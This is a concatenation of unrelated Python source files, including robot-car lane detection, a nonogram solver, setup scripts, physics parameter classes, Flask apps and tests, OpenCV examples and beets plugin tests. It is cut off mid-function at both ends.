((imshape[1] * (1 - trap_top_width)) // 2, imshape[0] - imshape[0] * trap_height),\
(imshape[1] - (imshape[1] * (1 - trap_top_width)) // 2, imshape[0] - imshape[0] * trap_height),\
(imshape[1] - (imshape[1] * (1 - trap_bottom_width)) // 2, imshape[0])]]\
, dtype=np.int32)
masked_edges = region_of_interest(edges, vertices)
img = masked_edges
min_line_len = min_line_length
lines = cv2.HoughLinesP(img, rho, theta, threshold, np.array([]), minLineLength=min_line_len, maxLineGap=max_line_gap)
if lines is None:
return None
line_img = np.zeros((*img.shape, 3), dtype=np.uint8) # 3-channel RGB image
newlines = draw_lines(line_img, lines)
for line in newlines:
if line[1] < line[3]:
line[0], line[1], line[2], line[3] = line[2], line[3], line[0], line[1]
if newlines[0][0] > newlines[1][0]:
newlines[0], newlines[1] = newlines[1], newlines[0]
return(newlines)
if __name__ == '__main__':
car = Car()
inf = Infrad()
v1, v2 = 60, 60
car.set_speed(v1, v2)
try:
while True:
left, right, nl, nr = inf.detect()
# print(left, right)
left_ans = True if left else False
right_ans = True if right else False
new_left = True if nl else False
new_right = True if nr else False
print(str(left_ans) + ", " + str(right_ans) + ", " + str(new_left) + ', ' + str(new_right))
if not left_ans and right_ans and new_left and new_right:
find_right(car)
elif not right_ans and left_ans and new_left and new_right:
find_left(car)
elif not new_left and new_right:
rush_left(car)
elif not new_right and new_left:
rush_right(car)
elif not new_left and not new_right:
set_slow(car)
except KeyboardInterrupt:
GPIO.cleanup()
"""
v1, v2 = 0, 0
rawCapture = picamera.array.PiRGBArray(camera, size = im_size)
for frame in camera.capture_continuous(rawCapture, format='bgr', use_video_port=True):
image = frame.array
image = image.reshape((640, 480, 3))
rawCapture.truncate(0)
lines = stage_detect(image)
v1, v2 = stage_control(lines, car)
# print(v1, v2)
if lines != None:
left, right = lines[0], lines[1]
if left[0] > right[0]:
left[0], right[0] = right[0], left[0]
print(left[0]/320, right[0]/320, v1, v2)
else:
print(-1, -1)
""" |
from memoize import memoized
def is_complete(csp, assignment):
w, h, horiz_constr, vert_constr = csp
return len(assignment) == h
@memoized
def order_domain_values(csp, var):
w, h, horiz_constr, vert_constr = csp
# calculate the possible lengths and movements
# generate the numbers by moving sequences of ones
for bits in generate_bits(horiz_constr[var][::-1], w):
yield bits
def generate_bits(constraint, length):
return generate_bits_rec(constraint, length, bits=(), zeros=0, part=0)
def generate_bits_rec(constraint, length, bits, zeros, part):
if len(bits) == length and part == len(constraint) + 1:
yield bits
if part == 0 or part >= len(constraint):
choice_start = 0
else:
choice_start = 1
for choice in range(choice_start, length - sum(constraint) - zeros + 1):
if part < len(constraint):
new_bits = bits + (0,) * choice + (1,) * constraint[part]
else:
new_bits = bits + (0,) * choice
new_zeros = zeros + choice
new_part = part + 1
if new_part <= len(constraint) + 1 and len(new_bits) <= length:
yield from generate_bits_rec(constraint, length, new_bits, new_zeros, new_part)
# @memoized
def is_consistent(csp, assignment, value):
# Todo: should be called value_is_consistent_with_assignment
"""Assumes all the assignments are consistent with the horizontal constraints so it checks only the verticals."""
w, h, horiz_constr, vert_constr = csp
new_ass = assign_value(assignment, value, len(assignment))
if len(new_ass) == h:
for col in range(len(vert_constr)):
if not col_is_consistent(csp, new_ass, vert_constr[col], col):
return False
return True
# @memoized
def col_is_consistent(csp, assignment, constr, col):
w, h, horiz_constr, vert_constr = csp
row = tuple(bits[col] for bits in assignment)
return row_is_consistent(csp, row, constr)
# @memoized
def row_is_consistent(csp, bits, constraint):
lengths_of_1 = []
prev = False
current_length = 0
for bit in bits:
if bit:
current_length += 1
else:
if prev:
if len(lengths_of_1) < len(constraint) and current_length != constraint[len(lengths_of_1)]:
return False
lengths_of_1.append(current_length)
current_length = 0
prev = bit
if current_length > 0:
lengths_of_1.append(current_length)
return len(lengths_of_1) == len(constraint) and all([(a == b) for a, b in zip(lengths_of_1, constraint)])
def complete_assignment(csp):
w, h, horiz_constr, vert_constr = csp
assignment = ()
for var in range(h):
assignment = assign_value(assignment, next(order_domain_values(csp, var)), var)
# todo: maybe choosing values consistent with the vertical constraints will speed things up since we start "nearer"
return assignment
def assign_value(assignment, value, var):
return assignment[:var] + (value,) + assignment[var + 1:]
def null_assignment():
return ()
#
# def assign_value(assignment, value, var):
# return assignment[:var] + [value] + assignment[var + 1:]
#
#
# def null_assignment():
# return []
|
from setuptools import setup, Extension
def readme():
with open('README.md') as f:
return f.read()
PACKAGES = ['cornichon']
PACKAGE_DATA = {
'.': ['README.md']
}
# import distutils.sysconfig
setup(name='cornichon',
version='0.1',
description='A way to save the data of a class in python',
long_description=readme(),
classifiers=[
'Development Status :: 1 - Prealpha',
'License :: ',
'Programming Language :: Python :: 3.6',
],
url='http://github.com/',
author='Thomas Lettau',
author_email='thomas_lettau@gmx.de',
license='MIT',
packages=PACKAGES,
# install_requires=[
# 'pickle'
# ],
package_data=PACKAGE_DATA,
zip_safe=False)
|
class Solution:
# https://leetcode.com/problems/reverse-integer/discuss/4220/Simple-Python-solution-56ms
# https://leetcode.com/problems/reverse-integer/discuss/4055/Golfing-in-Python
def reverse(self, x):
"""
:type x: int
:rtype: int
"""
def sign(x): return x and (1, -1)[x < 0]
r = int(str(sign(x)*x)[::-1])
return (sign(x)*r, 0)[r > 2**31 - 1]
# s = -12345
# print (int(str(-s)[::-1]))
|
__author__ = "Narwhale"
import socket
client = socket.socket()
client.connect(('localhost',10000))
while True:
mag = input('>>>>:')
if not mag:
break
client.send(mag.encode(encoding='utf-8'))
data = client.recv(1024)
print(data)
|
#!/usr/bin/env python
import setuptools
with open("README.md", "r") as fh:
long_description = fh.read()
setuptools.setup(
name="onglai-classify-homologues",
version="1.0.0",
author="Adelene Lai",
author_email="adelene.lai@uni.lu",
maintainer="Adelene Lai",
maintainer_email="adelene.lai@uni.lu",
description="A cheminformatics algorithm to classify homologous series.",
long_description=long_description,
long_description_content_type="text/markdown",
url="https://github.com/adelenelai/onglai-classify-homologues",
packages=setuptools.find_packages(),
license="Apache",
install_requires=[
"pandas",
"numpy",
"matplotlib",
"pytest",
"rdkit",
"datamol",
],
package_data={"onglai-classify-homologues":["nextgen_classify_homologues*.*", "utils*.*"]},
classifiers=[
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: 3.7",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3 :: Only",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
],
python_requires=">=3.5",
)
|
"""Abstract base class for MSSM calculation."""
import json
import logging
import math
import pathlib
from typing import List, Optional
import simsusy.mssm.library
from simsusy.mssm.input import MSSMInput
logger = logging.getLogger(__name__)
class AbsSMParameters:
"""
The abstract version of the Standard Model parameters.
As an abstract class, this class only provides a basic I/O interface from
the SMINPUTS block and from the default_value file. Values except pole
masses are calculated in various loop levels, so left as unimplemented.
Note that mz(), mw(), vev(), etc. may be scale dependent, while mass(pid)
should return some scale-independent value (e.g., the pole mass).
"""
DEFAULT_DATA = (
pathlib.Path(__file__).parent.parent.resolve() / "default_values.json"
)
def default_value(self, key: str) -> float:
"""Return a value read from DEFAULT_DATA."""
default = self.default_values.get(key)
if isinstance(default, dict):
if isinstance(value := default.get("value"), float):
return value
raise RuntimeError(
f"Invalid parameter {key} in {self.DEFAULT_DATA}, which must be float."
)
def __init__(self, input: MSSMInput) -> None: # noqa: A002
with open(self.DEFAULT_DATA) as f:
self.default_values = json.load(f)
def get(key: int, default_key: str) -> float:
value = input.sminputs(key, default=None)
if isinstance(value, float):
return value
logger.info("Block SMINPUTS %d missing; default value is used.", key)
return self.default_value(default_key)
self._alpha_em_inv = get(1, "alpha_EW_inverse@m_Z") # MS-bar (5 active flavors)
self._g_fermi = get(2, "G_F")
self._alpha_s = get(3, "alpha_s@m_Z") # MS-bar, with 5 active flavors
self._mz = get(4, "m_Z") # pole
self._mb_mb = get(5, "m_b@m_b") # MS-bar, at mb
self._mt = get(6, "m_t") # pole
self._mtau = get(7, "m_tau") # pole
self._mnu1 = get(12, "m_nu1") # pole
self._mnu2 = get(14, "m_nu2") # pole
self._mnu3 = get(8, "m_nu3") # pole
self._me = get(11, "m_e") # pole
self._mmu = get(13, "m_mu") # pole
self._md_2gev = get(21, "m_d@2GeV") # MS-bar, at 2GeV
self._mu_2gev = get(22, "m_u@2GeV") # MS-bar, at 2GeV
self._ms_2gev = get(23, "m_s@2GeV") # MS-bar, at 2GeV
self._mc_mc = get(24, "m_c@m_c") # MS-bar, at mc
# pole-mass handlers
def mass(self, pid: int) -> float:
"""Return the pole mass of the particle with the given PDG ID."""
if pid == 6:
return self._mt
elif pid == 11:
return self._me
elif pid == 13:
return self._mmu
elif pid == 15:
return self._mtau
elif pid == 12:
return self._mnu1
elif pid == 14:
return self._mnu2
elif pid == 16:
return self._mnu3
elif pid == 23:
return self._mz
else:
return NotImplemented
def mass_u(self) -> List[float]:
"""Return the up-type quark masses."""
return [self.mass(i) for i in (2, 4, 6)]
def mass_d(self) -> List[float]:
"""Return the down-type quark masses."""
return [self.mass(i) for i in (1, 3, 5)]
def mass_e(self) -> List[float]:
"""Return the charged lepton masses."""
return [self.mass(i) for i in (11, 13, 15)]
def mass_n(self) -> List[float]:
"""Return the neutrino masses."""
return [self.mass(i) for i in (12, 14, 16)]
# Weinberg angles, dependent on `_sin_sq_cos_sq`.
def sin_w_sq(self) -> float:
"""Return sin^2(theta_w)."""
r = self._sin_sq_cos_sq()
return 2 * r / (1 + math.sqrt(1 - 4 * r))
def cos_w_sq(self) -> float:
"""Return cos^2(theta_w)."""
r = self._sin_sq_cos_sq()
return (1 + math.sqrt(1 - 4 * r)) / 2
# abstract functions
def _sin_sq_cos_sq(self) -> float:
"""Return sin^2(theta_w)*cos^2(theta_w)."""
return NotImplemented
def mz(self) -> float:
"""Return the Z-boson mass, which may not be the pole mass."""
return self._mz
def mw(self) -> float:
"""Return the W-boson mass, which may not be the pole mass."""
return NotImplemented
def gw(self) -> float:
"""Return the SU(2)_weak coupling."""
return NotImplemented
def gy(self) -> float:
"""Return the U(1)_Y coupling."""
return NotImplemented
def gs(self) -> float:
"""Return the strong coupling."""
return NotImplemented
def vev(self) -> float:
"""Return the vacuum expectation value of Higgs."""
return NotImplemented
class AbsEWSBParameters:
"""
The abstract version of the MSSM EWSB parameters.
As an abstract class, this class only provides I/O from the input file.
The SLHA convention allows following inputs:
- tan(beta) and two Higgs soft masses,
- tan(beta), mu, and tree-level pseudo-scalar mass,
- tan(beta), mu, and pseudo-scalar pole mass,
- tan(beta), mu, and charged-Higgs pole mass.
The input file should have a proper combination of those seven parameters
and the calculator should be able to handle any of the combinations. Also,
if mu is not specified, `sign_mu` is allowed as a complex input, which
should be properly handled.
"""
sign_mu: complex # sign (or argument) of mu parameters
_tb_ewsb: Optional[float] # tan(beta) at the EWSB scale
_tb_input: Optional[float] # tan(beta) at the input scale
mh1_sq: Optional[complex] # down-type Higgs soft mass at the input scale
mh2_sq: Optional[complex] # up-type Higgs soft mass at the input scale
mu: Optional[complex] # mu-parameter at the input scale
ma_sq: Optional[complex] # tree-level mass of A at the input scale
ma0: Optional[float] # pole mass of A
mhc: Optional[float] # pole mass of H+
# abstracts
@property
def tan_beta(self) -> float:
"""Return tan_beta at the input scale."""
return NotImplemented # should be implemented in the derived class
def alpha(self) -> float:
"""Return the angle between the Higgses."""
return NotImplemented
# implementation
def __init__(self, model: MSSMInput) -> None:
"""Fill the values from SLHA input."""
self._tb_ewsb = model.get_float("MINPAR", 3, default=None)
self._tb_input = model.get_float("EXTPAR", 25, default=None)
self.mh1_sq = model.get_complex("EXTPAR", 21, default=None)
self.mh2_sq = model.get_complex("EXTPAR", 22, default=None)
self.mu = model.get_complex("EXTPAR", 23, default=None)
self.ma_sq = model.get_complex("EXTPAR", 24, default=None)
self.ma0 = model.get_float("EXTPAR", 26, default=None)
self.mhc = model.get_float("EXTPAR", 27, default=None)
# determine the sign of mu parameter
if self.mu is not None: # direct specification of mu parameter
self.sign_mu = 1
else: # |mu| is determined by EWSB condition and sign_mu is required.
sin_phi_mu = model.get_float("IMMINPAR", 4, default=None)
if sin_phi_mu: # CP-violated
cos_phi_mu = model.get_float("MINPAR", 4)
if not (0.99 < (abs_sq := cos_phi_mu**2 + sin_phi_mu**2) < 1.01):
raise ValueError("Invalid mu-phase (MINPAR 4 and IMMINPAR 4)")
self.sign_mu = complex(cos_phi_mu, sin_phi_mu) / math.sqrt(abs_sq)
else: # CP-conserved
sign_mu = model.get_float("MINPAR", 4)
if not 0.9 < abs(sign_mu) < 1.1:
raise ValueError("Invalid EXTPAR 4; either 1 or -1.")
self.sign_mu = -1 if sign_mu < 0 else 1
# mh1_sq and mh2_sq may be specified in the MINPAR block.
if self._count_unspecified_params() > 4:
if (m0 := model.get_float("EXTPAR", 1, default=None)) is not None:
if self.mh1_sq is None:
self.mh1_sq = m0 * m0
if self.mh2_sq is None:
self.mh2_sq = m0 * m0
# check if tan(beta) is properly set.
if self.tan_beta == NotImplemented:
raise RuntimeError("Missing implementation of tan_beta().")
elif self.tan_beta is None:
logger.error("invalid specification of tan_beta")
# check if the parameters are set in one of the proper combinations.
if self._count_unspecified_params() == 4: # it must be four.
if self.mh1_sq is not None and self.mh2_sq is not None:
return # pass
elif self.mu is not None:
if (
self.ma_sq is not None
or self.ma0 is not None
or self.mhc is not None
):
return # pass
logger.error("invalid specification of EWSB parameters")
def _count_unspecified_params(self) -> int:
return [
self.mh1_sq,
self.mh2_sq,
self.mu,
self.ma_sq,
self.ma0,
self.mhc,
].count(None)
def is_set(self) -> bool:
"""Check if the EWSB parameter is calculated."""
return (
isinstance(self.tan_beta, (int, float))
and self._count_unspecified_params() == 0
)
def yukawa(self, species: simsusy.mssm.library.A) -> List[float]:
"""Return the diagonal of Yukawa."""
if species == simsusy.mssm.library.A.U:
return self.yu()
elif species == simsusy.mssm.library.A.D:
return self.yd()
elif species == simsusy.mssm.library.A.E:
return self.ye()
else:
raise RuntimeError("invalid call of ewsb.yukawa")
# virtual functions
def yu(self) -> List[float]:
"""Return the diagonal of up-type Yukawa after super-CKM rotation."""
raise NotImplementedError
def yd(self) -> List[float]:
"""Return the diagonal of down-type Yukawa."""
raise NotImplementedError
def ye(self) -> List[float]:
"""Return the diagonal of charged-lepton Yukawa."""
raise NotImplementedError
def mass(self, pid: int) -> float:
"""Return the pole mass of the particle with the given PDG ID."""
raise NotImplementedError
|
print('='*30)
print('Sequeência de Fibonacci')
print('-' *30)
n = int(input('Digite quantos termos você deseja? '))
t1 = 0
t2 = 1
c=3
print(' {} -> {} ->'.format(t1, t2), end='')
while c <= n:
t3 = t1+t2
print(' ->{}'.format(t3), end='')
t1 = t2
t2 = t3
c = c+1
print(' -> FIM!')
|
# -*- coding: utf-8 -*-
import unittest
from datetime import datetime
from flask import Flask
from flaskext.mongokit import MongoKit, BSONObjectIdConverter, \
Document, Database, Collection
from werkzeug.exceptions import BadRequest
from bson import ObjectId
class BlogPost(Document):
__collection__ = "posts"
structure = {
'title': unicode,
'body': unicode,
'author': unicode,
'date_creation': datetime,
'rank': int,
'tags': [unicode],
}
required_fields = ['title', 'author', 'date_creation']
default_values = {'rank': 0, 'date_creation': datetime.utcnow}
use_dot_notation = True
class TestCase(unittest.TestCase):
def setUp(self):
self.app = Flask(__name__)
self.app.config['TESTING'] = True
self.app.config['MONGODB_DATABASE'] = 'flask_testing'
self.db = MongoKit(self.app)
self.ctx = self.app.test_request_context('/')
self.ctx.push()
def tearDown(self):
self.ctx.pop()
def test_initialization(self):
self.db.register([BlogPost])
assert len(self.db.registered_documents) > 0
assert self.db.registered_documents[0] == BlogPost
assert isinstance(self.db, MongoKit)
assert self.db.name == self.app.config['MONGODB_DATABASE']
assert isinstance(self.db.test, Collection)
def test_property_connected(self):
assert not self.db.connected
self.db.connect()
assert self.db.connected
self.db.disconnect()
assert not self.db.connected
def test_bson_object_id_converter(self):
converter = BSONObjectIdConverter("/")
self.assertRaises(BadRequest, converter.to_python, ("132"))
assert converter.to_python("4e4ac5cfffc84958fa1f45fb") == \
ObjectId("4e4ac5cfffc84958fa1f45fb")
assert converter.to_url(ObjectId("4e4ac5cfffc84958fa1f45fb")) == \
"4e4ac5cfffc84958fa1f45fb"
def test_save_and_find_document(self):
self.db.register([BlogPost])
assert len(self.db.registered_documents) > 0
assert self.db.registered_documents[0] == BlogPost
post = self.db.BlogPost()
post.title = u"Flask-MongoKit"
post.body = u"Flask-MongoKit is a layer between Flask and MongoKit"
post.author = u"Christoph Heer"
post.save()
assert self.db.BlogPost.find().count() > 0
rec_post = self.db.BlogPost.find_one({'title': u"Flask-MongoKit"})
assert rec_post.title == post.title
assert rec_post.body == rec_post.body
assert rec_post.author == rec_post.author
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TestCase))
return suite
if __name__ == '__main__':
unittest.main() |
import numpy as np
import cv2
def contour():
img = cv2.imread('images/star.jpg')
imgray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)
ret, thr = cv2.threshold(imgray, 127, 255, 0)
_, contours, _ = cv2.findContours(thr, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
cnt = contours[0]
hull = cv2.convexHull(cnt)
cv2.drawContours(img, [hull], 0, (0, 0, 255), 2)
hull = cv2.convexHull(cnt, returnPoints=False)
#contour와 convexHull이 만나는 부분의 contour 인덱스를 리턴
defects = cv2.convexityDefects(cnt, hull)
for i in range(defects.shape[0]):
sp, ep, fp, dist = defects[i, 0]
start = tuple(cnt[sp][0])
end = tuple(cnt[ep][0])
farthest = tuple(cnt[fp][0])
cv2.circle(img, farthest, 5, (0, 255, 0), -1)
cv2.imshow('defects', img)
cv2.waitKey(0)
cv2.destroyAllWindows()
contour()
|
# -*- coding: utf-8 -*-
import re
from colormath.color_objects import sRGBColor, LabColor
from colormath.color_conversions import convert_color
from colormath.color_diff import delta_e_cie2000
from pycolorname.color_system import ColorSystem
class CalPrint(ColorSystem):
def __init__(self, *args, **kwargs):
ColorSystem.__init__(self, *args, **kwargs)
self.load()
def refresh(self):
full_data = self.request('GET',
"http://www.cal-print.com/InkColorChart.htm")
tds = full_data.find_all('td', attrs={"bgcolor": re.compile(r".*")})
raw_data = {}
known_names = []
for td in tds:
table = td.find_parent('table')
name = table.find("font").text
color = self.hex_to_rgb(td['bgcolor'])
# remove excess whitespace
name = re.sub(re.compile(r"\s+"), " ", name.strip())
if 'PMS' not in name and 'Pantone' not in name:
name = 'Pantone ' + name
raw_data[name] = color
if not name.startswith('PMS'):
known_names.append(name)
# Add white
raw_data['White'] = (255, 255, 255)
known_names.append('White')
# Find distance between colors and find better names for unnamed
# colors in the table.
data = {}
for name, color in raw_data.items():
rgb = sRGBColor(*color)
lab = convert_color(rgb, LabColor, target_illuminant='D65')
min_diff = float("inf")
min_name = ""
for known_name in known_names:
known_color = raw_data[known_name]
known_rgb = sRGBColor(*known_color)
known_lab = convert_color(known_rgb, LabColor,
target_illuminant='D65')
diff = delta_e_cie2000(lab, known_lab)
if min_diff > diff:
min_diff = diff
min_name = known_name
data['{0} ({1})'.format(name, min_name)] = color
return data
|
from script.base_api.api_operation_app.memberships import *
from script.base_api.api_operation_app.pay import *
from script.base_api.api_operation_app.versionInfo import *
from script.base_api.api_operation_app.employee import *
from script.base_api.api_operation_app.public import *
from script.base_api.api_operation_app.statistics import *
from script.base_api.api_operation_app.finance import *
from script.base_api.api_operation_app.classes import *
from script.base_api.api_operation_app.lost_communicate_record import *
from script.base_api.api_operation_app.classroom import *
from script.base_api.api_operation_app.staging import *
from script.base_api.api_operation_app.back_clue import *
from script.base_api.api_operation_app.students import *
from script.base_api.api_operation_app.clue import *
from script.base_api.api_operation_app.order import *
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__license__ = ''
__version__ = '1.0.1'
get_timezone_list_query = """
SELECT *
FROM public.time_zone AS tmz
WHERE tmz.deleted is FALSE
AND (
$1::VARCHAR is NULL OR
tmz.name ILIKE $1::VARCHAR || '%' OR
tmz.name ILIKE '%' || $1::VARCHAR || '%' OR
tmz.name ILIKE $1::VARCHAR || '%')
"""
get_timezone_list_count_query = """
SELECT count(*) AS timezone_count
FROM public.time_zone AS tmz
WHERE tmz.deleted is FALSE
AND (
$1::VARCHAR is NULL OR
tmz.name ILIKE $1::VARCHAR || '%' OR
tmz.name ILIKE '%' || $1::VARCHAR || '%' OR
tmz.name ILIKE $1::VARCHAR || '%')
"""
get_timezone_element_query = """
SELECT *
FROM public.time_zone AS tmz
WHERE tmz.deleted is FALSE
AND tmz.id = $1
"""
get_timezone_element_by_name_query = """
SELECT *
FROM public.time_zone AS tmz
WHERE tmz.deleted is FALSE
AND (
$1::VARCHAR is NULL OR
tmz.name ILIKE $1::VARCHAR || '%' OR
tmz.name ILIKE '%' || $1::VARCHAR || '%' OR
tmz.name ILIKE $1::VARCHAR || '%')
"""
get_timezone_element_by_code_query = """
SELECT *
FROM public.time_zone AS tmz
WHERE tmz.deleted is FALSE
AND tmz.name = $1::VARCHAR LIMIT 1;
"""
get_timezone_list_dropdown_query = """
SELECT tmz.id AS id,
tmz.name AS name,
tmz.active AS active,
tmz.deleted AS deleted
FROM public.time_zone AS tmz
WHERE tmz.deleted is FALSE
AND (
$1::VARCHAR is NULL OR
tmz.name ILIKE $1::VARCHAR || '%' OR
tmz.name ILIKE '%' || $1::VARCHAR || '%' OR
tmz.name ILIKE $1::VARCHAR || '%')
"""
|
import string
import random
def gen():
s1 = string.ascii_uppercase
s2 = string.ascii_lowercase
s3 = string.digits
s4 = string.punctuation
passlength = int(input("Enter the password length\n"))
s = [] # Created a empty list
s.extend(list(s1))
s.extend(list(s2))
s.extend(list(s3))
s.extend(list(s4)) # Appended all the letters, digits, and special characters in the list
random.shuffle(s)
password = ("".join(s[0:passlength]))
print(password)
gen() |
# -*- coding: utf-8 -*-
##############################################################################
#
# Copyright (C) 2013-2015 Marcos Organizador de Negocios SRL http://marcos.do
# Write by Eneldo Serrata (eneldo@marcos.do)
#
##############################################################################
from openerp import models, fields, api
import base64
import openerp.addons.decimal_precision as dp
class ipf_monthly_book(models.Model):
_name = "ipf.monthly.book"
subsidiary = fields.Many2one("shop.ncf.config", string="Sucursal", required=True)
period_id = fields.Many2one("account.period", string="Periodo", readonly=False, required=True)
book = fields.Binary("Libro Mensual", readonly=True)
filename = fields.Char("file name")
doc_qty = fields.Integer("Transacciones", digits=dp.get_precision('Account'))
total = fields.Float("Total", digits=dp.get_precision('Account'))
total_tax = fields.Float("Total Itbis", digits=dp.get_precision('Account'))
final_total = fields.Float("Final total", digits=dp.get_precision('Account'))
final_total_tax = fields.Float("Final Itbis total", digits=dp.get_precision('Account'))
fiscal_total = fields.Float("Fiscal total", digits=dp.get_precision('Account'))
fiscal_total_tax= fields.Float("Fiscal Itbis total", digits=dp.get_precision('Account'))
ncfinal_total = fields.Float("NC final total", digits=dp.get_precision('Account'))
ncfinal_total_tax = fields.Float("NC final Itbis total", digits=dp.get_precision('Account'))
ncfiscal_total = fields.Float("NC fiscal total", digits=dp.get_precision('Account'))
ncfiscal_total_tax = fields.Float("NC fiscal Itbis total", digits=dp.get_precision('Account' )) |
from flask import render_template, redirect, url_for, flash, get_flashed_messages
from market import app
from market.forms import RegisterForm
from market.models import U2Message
app_styles = {}
base_style = "body { background-color: purple; color: white }"
app_styles['base'] = base_style
@app.route('/')
@app.route('/home')
def home_page():
return render_template('home.html', app_styles=app_styles)
@app.route('/search')
def search_page():
u2M = U2Message()
planitems = u2M.get_planitems()
return render_template('search.html', app_styles=app_styles, planitems=planitems)
@app.route('/select')
def select_page():
u2M = U2Message()
items = u2M.get_items()
return render_template('select.html', app_styles=app_styles, items=items)
@app.route('/party')
def party_page():
return render_template('party.html', app_styles=app_styles)
@app.route('/cart')
def cart_page():
return render_template('cart.html', app_styles=app_styles)
@app.route('/places')
def places_page():
return render_template('places.html', app_styles=app_styles)
@app.route('/routes')
def routes_page():
return render_template('routes.html', app_styles=app_styles)
@app.route('/top_lists')
def top_lists_page():
return render_template('top_lists.html', app_styles=app_styles)
@app.route('/offers')
def offers_page():
return render_template('offers.html', app_styles=app_styles)
@app.route('/sponsors')
def sponsors_page():
return render_template('sponsors.html', app_styles=app_styles)
@app.route('/subscriptions')
def subscriptions_page():
return render_template('subscriptions.html', app_styles=app_styles)
@app.route('/bookings')
def bookings_page():
return render_template('bookings.html', app_styles=app_styles)
@app.route('/register', methods=['GET', 'POST'])
def register_page():
form = RegisterForm()
if form.validate_on_submit():
# create user u2
return redirect(url_for('home_page'))
# print(f'no. errors = {form.errors}')
if form.errors != {}:
for err_msg in form.errors.values():
flash(f'There was an Error creating a User: {err_msg}', category="danger")
return render_template('register.html', app_styles=app_styles, form=form)
|
# This file is part of beets.
# Copyright 2016, Fabrice Laporte.
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
"""Tests for the 'lastgenre' plugin."""
import unittest
from unittest.mock import Mock
from test import _common
from beetsplug import lastgenre
from beets import config
from test.helper import TestHelper
class LastGenrePluginTest(unittest.TestCase, TestHelper):
def setUp(self):
self.setup_beets()
self.plugin = lastgenre.LastGenrePlugin()
def tearDown(self):
self.teardown_beets()
def _setup_config(self, whitelist=False, canonical=False, count=1,
prefer_specific=False):
config['lastgenre']['canonical'] = canonical
config['lastgenre']['count'] = count
config['lastgenre']['prefer_specific'] = prefer_specific
if isinstance(whitelist, (bool, (str,))):
# Filename, default, or disabled.
config['lastgenre']['whitelist'] = whitelist
self.plugin.setup()
if not isinstance(whitelist, (bool, (str,))):
# Explicit list of genres.
self.plugin.whitelist = whitelist
def test_default(self):
"""Fetch genres with whitelist and c14n deactivated
"""
self._setup_config()
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Delta Blues')
def test_c14n_only(self):
"""Default c14n tree funnels up to most common genre except for *wrong*
genres that stay unchanged.
"""
self._setup_config(canonical=True, count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Blues')
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'Iota Blues')
def test_whitelist_only(self):
"""Default whitelist rejects *wrong* (non existing) genres.
"""
self._setup_config(whitelist=True)
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'')
def test_whitelist_c14n(self):
"""Default whitelist and c14n both activated result in all parents
genres being selected (from specific to common).
"""
self._setup_config(canonical=True, whitelist=True, count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Delta Blues, Blues')
def test_whitelist_custom(self):
"""Keep only genres that are in the whitelist.
"""
self._setup_config(whitelist={'blues', 'rock', 'jazz'},
count=2)
self.assertEqual(self.plugin._resolve_genres(['pop', 'blues']),
'Blues')
self._setup_config(canonical='', whitelist={'rock'})
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'')
def test_count(self):
"""Keep the n first genres, as we expect them to be sorted from more to
less popular.
"""
self._setup_config(whitelist={'blues', 'rock', 'jazz'},
count=2)
self.assertEqual(self.plugin._resolve_genres(
['jazz', 'pop', 'rock', 'blues']),
'Jazz, Rock')
def test_count_c14n(self):
"""Keep the n first genres, after having applied c14n when necessary
"""
self._setup_config(whitelist={'blues', 'rock', 'jazz'},
canonical=True,
count=2)
# thanks to c14n, 'blues' superseeds 'country blues' and takes the
# second slot
self.assertEqual(self.plugin._resolve_genres(
['jazz', 'pop', 'country blues', 'rock']),
'Jazz, Blues')
def test_c14n_whitelist(self):
"""Genres first pass through c14n and are then filtered
"""
self._setup_config(canonical=True, whitelist={'rock'})
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'')
def test_empty_string_enables_canonical(self):
"""For backwards compatibility, setting the `canonical` option
to the empty string enables it using the default tree.
"""
self._setup_config(canonical='', count=99)
self.assertEqual(self.plugin._resolve_genres(['delta blues']),
'Blues')
def test_empty_string_enables_whitelist(self):
"""Again for backwards compatibility, setting the `whitelist`
option to the empty string enables the default set of genres.
"""
self._setup_config(whitelist='')
self.assertEqual(self.plugin._resolve_genres(['iota blues']),
'')
def test_prefer_specific_loads_tree(self):
"""When prefer_specific is enabled but canonical is not the
tree still has to be loaded.
"""
self._setup_config(prefer_specific=True, canonical=False)
self.assertNotEqual(self.plugin.c14n_branches, [])
def test_prefer_specific_without_canonical(self):
"""Prefer_specific works without canonical.
"""
self._setup_config(prefer_specific=True, canonical=False, count=4)
self.assertEqual(self.plugin._resolve_genres(
['math rock', 'post-rock']),
'Post-Rock, Math Rock')
def test_no_duplicate(self):
"""Remove duplicated genres.
"""
self._setup_config(count=99)
self.assertEqual(self.plugin._resolve_genres(['blues', 'blues']),
'Blues')
def test_tags_for(self):
class MockPylastElem:
def __init__(self, name):
self.name = name
def get_name(self):
return self.name
class MockPylastObj:
def get_top_tags(self):
tag1 = Mock()
tag1.weight = 90
tag1.item = MockPylastElem('Pop')
tag2 = Mock()
tag2.weight = 40
tag2.item = MockPylastElem('Rap')
return [tag1, tag2]
plugin = lastgenre.LastGenrePlugin()
res = plugin._tags_for(MockPylastObj())
self.assertEqual(res, ['pop', 'rap'])
res = plugin._tags_for(MockPylastObj(), min_weight=50)
self.assertEqual(res, ['pop'])
def test_get_genre(self):
mock_genres = {'track': '1', 'album': '2', 'artist': '3'}
def mock_fetch_track_genre(self, obj=None):
return mock_genres['track']
def mock_fetch_album_genre(self, obj):
return mock_genres['album']
def mock_fetch_artist_genre(self, obj):
